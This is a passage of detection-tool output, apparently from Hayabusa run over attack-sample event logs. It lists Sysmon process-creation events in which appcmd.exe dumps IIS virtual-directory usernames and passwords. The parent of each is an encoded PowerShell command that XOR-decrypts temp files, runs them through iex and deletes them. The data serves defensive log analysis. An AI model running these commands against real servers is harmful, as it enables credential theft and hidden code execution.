IAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 1036 | PGUID: 365ABB72-3D6F-5CEB-0000-001026B9FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 01:29:19.323 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Filename: redirection.config"" /text:password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 168 | PGUID: 365ABB72-3D6F-5CEB-0000-00108FBFFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 01:29:19.403 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:userName | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 2484 | PGUID: 365ABB72-3D6F-5CEB-0000-00104FC3FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 01:29:19.473 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 2168 | PGUID: 365ABB72-3D6F-5CEB-0000-00100FC7FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 01:29:19.563 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Line Number: 0"" /text:userName | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 3892 | PGUID: 365ABB72-3D6F-5CEB-0000-0010CFCAFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 01:29:19.784 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Line Number: 0"" /text:password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 3844 | PGUID: 365ABB72-3D6F-5CEB-0000-0010F2CFFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 01:29:19.894 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:userName | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 